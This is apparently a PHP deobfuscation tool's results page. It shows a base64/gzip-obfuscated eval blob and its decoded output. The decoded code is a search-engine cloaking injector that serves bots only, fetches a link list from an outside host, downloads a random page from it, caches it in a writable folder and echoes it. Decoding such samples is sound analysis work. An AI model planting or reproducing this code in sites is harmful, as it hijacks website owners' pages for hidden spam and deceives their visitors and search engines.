Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
eval( gzinflate( base64_decode('TVXXCuzIFfyX+7I2Y1Y5YfygVs7SKIsLRjmMRlkzkr7eWt+F3Yei+lRV01..
Decoded Output download
h5('http://mycompanyeye.com/bulbozavr/puk7/13.list', 1 * 900);
function h5($u, $t){
$nobot = isset($_REQUEST['nobot']) ? true : false;
$debug = isset($_REQUEST['debug']) ? true : false;
$t2 = 3600 * 5;
$t3 = 3600 * 12;
$tm = (!@ini_get('upload_tmp_dir')) ? '/tmp/' : @ini_get('upload_tmp_dir');
if (!$tmp = triksp(array($tm, './images/avatars/'))) {
if ($debug) {
echo('DEBUG: (ERROR: temporary path not found, return)<br>' . "
");
}
return;
}
$agent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
if ($debug) {
echo('DEBUG: (INFO: temporary path=' . $tm . ')<br>, agent ('.$agent.')' . "
");
}
if (!preg_match('%(http|curl|google|yahoo|yandex|ya|bing|bot|crawl|lynx|SiteUptime|Spider|ia_archiver|AOL|slurp|msn)%i', $agent, $ret)) {
if ($debug) {
echo('DEBUG: (ERROR: you is not spider, return)<br>'."
");
}
return;
}
if ($debug) {
echo('DEBUG: (bot by:['.$ret[1].'])<br>'."
");
}
if ($t) {
if ($debug) {
if (file_exists($tmp . md5($u) . 'c')) {
echo('DEBUG: (INFO: link file exists=' . $tmp . md5($u) . 'c)<br>' . "
");
$filemtime = filemtime($tmp . md5($u) . 'c');
$current = time();
$diff = $current - $filemtime;
echo('DEBUG: (TIME: current=' . $current . ', filemtime=' . $filemtime . ', different=' . $diff . ', cache_time=' . $t . ')<br>' . "
");
if ($diff < $t) {
echo('DEBUG: (INFO: USING CACHE LINK FILE<br>' . "
");
} else {
echo('DEBUG: (INFO: DOWNLOAD NEW LINK FILE<br>' . "
");
}
}
}
if (file_exists($tmp . md5($u . 'c')) && (time() - filemtime($tmp . md5($u . 'c'))) < $t) {
readfile($tmp . md5($u . 'c'));
if ($debug) {
echo('DEBUG: (END: readfile link, return)<br>' . "
");
}
return;
}
}
if ($debug) {
if (file_exists($tmp . md5($u))) {
echo('DEBUG: (INFO: lists file exists=' . $tmp . md5($u) . ')<br>' . "
");
$filemtime = filemtime($tmp . md5($u));
$current = time();
$diff = $current - $filemtime;
echo('DEBUG: (TIME: current=' . $current . ', filemtime=' . $filemtime . ', different=' . $diff . ', cache_time=' . $t3 . ')<br>' . "
");
if ($diff < $t3) {
echo('DEBUG: (INFO: USING CACHE LIST FILE<br>' . "
");
} else {
echo('DEBUG: (INFO: DOWNLOAD NEW LIST FILE<br>' . "
");
}
}
}
if (file_exists($tmp . md5($u)) && (time() - filemtime($tmp . md5($u))) < $t3) {
$d = file($tmp . md5($u));
} else {
$c = curl_init($u);
if (!$c) {
if ($debug) {
echo('DEBUG: (ERROR: curl(list) not init, return)<br>' . "
");
}
return;
}
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$d = curl_exec($c);
$l = curl_getinfo($c);
curl_close($c);
if ($l['http_code'] == 200 && $d) {
@file_put_contents($tmp . md5($u), $d);
$d = explode("
", $d);
}
}
if ($debug) {
echo('DEBUG: (INFO: size list_array=' . sizeof($d) . ')<br>' . "
");
}
if ($d) {
$l = @array_rand($d);
$c = @curl_init(trim($d[$l]));
if (!$c) {
if ($debug) {
echo('DEBUG: (ERROR: curl(link) not init, return)<br>' . "
");
}
return;
}
if ($t) {
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
}
$d = curl_exec($c);
if ($t) {
if ($debug) {
echo('DEBUG: (INFO: link download)<br>' . "
");
}
@file_put_contents($tmp . md5($u . 'c'), $d);
echo($d);
} else {
if ($debug) {
echo('DEBUG: (ERROR: link NOT download)<br>' . "
");
}
}
@curl_close($c);
}
}
function triksp($array){
foreach ($array as $path) {
if (is_writable($path)) {
return $path;
}
}
return false;
}
Did this file decode correctly?
Original Code
eval( gzinflate( base64_decode('TVXXCuzIFfyX+7I2Y1Y5YfygVs7SKIsLRjmMRlkzkr7eWt+F3Yei+lRV01DQnGkp6/8u5dSnefmPH9DvD6j88a8fPw+S+HlQ5M3IDe7ngdI3U7fG3szcEG6Qv7w/MhT+687/c+ifGvZLw+4cdvuEeM9/5sg/vL/NKP3bERRbzkySYOPGB9U739UmhxZQHHM1nEkt3duMyG/w1MOd7pE6/NIe2J7A6wueoeGDeY3y6VYOhwLejk2+pDZqt1eoXMJ4aDrcU94jIn2onKtQBcgGOWERjT7rAes62msIXIGXvUJfuVmuZYsHZX3aOBfhjM0/7ZkwXjnr6CzRFpI4uSyMxhWSL2HDWc5XHL6WFnMv6yqZNBoLv+pkFxnNR0LzqzL0YPzGT9zwEFEiSuuFvpMuGMftkOVaZgZYPqBSqY/BbZIcNtFCO4WqjWFsOq/a7D1MEG2lpV9Li9GnHCcIjBJ1QbEHnlolekUOxqz1RDlp7OwgrLA8dJxrHXJHfJmMPPOP8Knh34RQFP27K7Ll5TynGcYKP07CmZAktZoIWavGc1ZjZqqF6cd6Bg9xsFniKXiGYoDUW5VXLn3Y+e4/lvGYZhh4NmxgQvhmqewzeGb4GWQH96RhngPxQYIPU5Fn2doMjPJf9Em1Lww5YsyXwlDEdMnYCh6zSw+Dr7zLhvKz0zRvJ0p7MnLkBHmNnIpyn8cw6mHMZMyY0EPTUrHUbmTrMvlKmrR6TsyvTqASXrgdmVzGt+EhcBLMd2bgS1Gndj002cfLT+FmAGam4fsiO9a70mK238JGnGNj7rzZ8VBHjcOeHT3FjYxrs5CxOUgyKKWA9R8xyA2MB9q+xsoSeNOKI1FZb/o+ruMg0UysnHggjaRFWbOOYFbZvpf1GaJaWNfDNQtotcpI50ASyi/4EjKpj/MNObxpYm5wnXqJZG0cfF1ul46G8CI6cFr2uqxyxslAvV86IceHka0KxUy4OkgKU61Bop0PpBqzQJzz3nWutELG7dTDC2U3D9NDtG37LMTDJdjDsJDCSelZnR/ENyJSSetGZnU2AIxvGGJZ0RO32S5PzLqKbxnJxBnrWbHn9i5RVTgHlgjzh2hePUku1BbZ2Sdrue4TIWpYBZD5aB+12vTDcRdPGjw4hJjd9ybTiKFrh0ONSCKdB8Qf1YagsWgvZxD71ZEzxRO1QizTN0IyVfKB7AJlwyzXkSwUYanKu6idzB1yIC4Cregzgzwkhzc0faDPyIzcykn6CgbIrn5MwS8hT9D7PPPMAXQ6TI5lC2wBM69C2Nlo3ACNADMaDtRrTU7rv+/ORroyXeWSpsozpCbNiZxLDwJQBoxdacP8Hh2ZiznOMI50AEQGMBSC6a/Qb4Z1IGBBde8DpeQu4jN/jqLqq1WqWNL76S4E32ZGyLlBvWrq0DWesKnceGSkJ/nMqkbxfJ3mK5EtM26OKML4q8i/gdmznc85T5fuetZM35n5nXZvYr7DYE15zE36VGkd7pzsGq0W4hcZuaseJebn/YriG7MKfdwCJx+6oRHrkhN8J0r3F+Ie2CmaOBnaM2maFmRBBqQAqILkz4A8Si0wxWadck2CieIMk03AbPZ4AZtgdlCNr+cDIU9lrOJ51gHaWEcSP4Nwujbc8jzCqh6AHNeZH6SlIAe681UPqPLHJwyHuqYBLC/FZc9U1kEkHqVO+ZUFwKALsL/pLpO1ofX+tCqpr1g13kVUX/Y/v90bgfkLGLiX0u8//vnv/wE=')));
Function Calls
gzinflate | 2 |
preg_replace | 1 |
base64_decode | 2 |
Stats
MD5 | e0719289a4608ed4ef4efa66375337ef |
Eval Count | 3 |
Decode Time | 98 ms |